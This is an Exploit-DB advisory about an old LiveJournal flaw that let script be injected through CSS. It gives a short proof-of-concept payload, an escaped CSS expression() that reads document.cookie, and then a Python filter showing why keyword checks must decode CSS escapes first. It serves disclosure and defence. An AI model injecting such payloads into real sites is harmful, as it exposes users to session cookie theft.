LiveJournal 1.1 - CSS HTML Injection

EDB-ID: 23749
CVE: N/A
Platform: PHP
Date: 2004-02-23


source: https://www.securityfocus.com/bid/9727/info

LiveJournal is reportedly prone to HTML injection via Cascading Style Sheet (CSS) tags. It is possible to inject hostile HTML and script code into journal entries through this vulnerability. 

This could potentially be exploited to steal cookies from other site users. Other attacks are also possible.

<style>
.test1 { color:e\xpression(alert(document.cookie)); }
</style>

<a class="test1">foo</a>
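
The payload above spells the `expression(` keyword as `e\xpression(`; in CSS a backslash before a non-hex character stands for that character, so a keyword check on the raw text and one on the decoded text disagree. The sketch below is an added example, not LiveJournal's code and not part of the original advisory; the function names and the benign sample rule are assumptions made for illustration.

```python
import re

# Payload line copied from the page; the benign rule is constructed for contrast.
PAGE_POC = r".test1 { color:e\xpression(alert(document.cookie)); }"
BENIGN = r'.quote:before { content: "\201C"; color: #c00; }'

# A CSS escape is a backslash plus 1-6 hex digits (one trailing whitespace
# character is consumed), or a backslash plus any other character, which then
# stands for itself. "x" is not a hex digit, so "\x" is read as plain "x".
_CSS_ESCAPE = re.compile(r"\\(?:([0-9a-fA-F]{1,6})[ \t\r\n\f]?|(.))", re.DOTALL)
_EXPRESSION = re.compile(r"expression\s*\(", re.IGNORECASE)


def decode_css_escapes(css):
    """Resolve backslash escapes the way a CSS tokenizer reads them."""
    def resolve(match):
        hex_digits, literal = match.group(1), match.group(2)
        if hex_digits is not None:
            code_point = int(hex_digits, 16)
            # Zero, surrogates and out-of-range values map to U+FFFD.
            if code_point == 0 or code_point > 0x10FFFF or 0xD800 <= code_point <= 0xDFFF:
                return "\ufffd"
            return chr(code_point)
        # Backslash-newline is a line continuation and contributes nothing.
        return "" if literal in "\n\r\f" else literal
    return _CSS_ESCAPE.sub(resolve, css)


def literal_match(css):
    """Keyword check on the raw text, as a simple filter might do it."""
    return "expression(" in css.lower()


def normalized_match(css):
    """Same check after escapes are decoded, i.e. on what the browser parses."""
    return _EXPRESSION.search(decode_css_escapes(css)) is not None


if __name__ == "__main__":
    for name, css in (("page PoC", PAGE_POC), ("benign", BENIGN)):
        print(f"{name}: literal={literal_match(css)} normalized={normalized_match(css)}")
```

Keyword detection after decoding is a backstop; accepting only an allowlist of properties and values from user-supplied style rules, or not accepting `<style>` at all, removes the dependency on knowing every dangerous keyword.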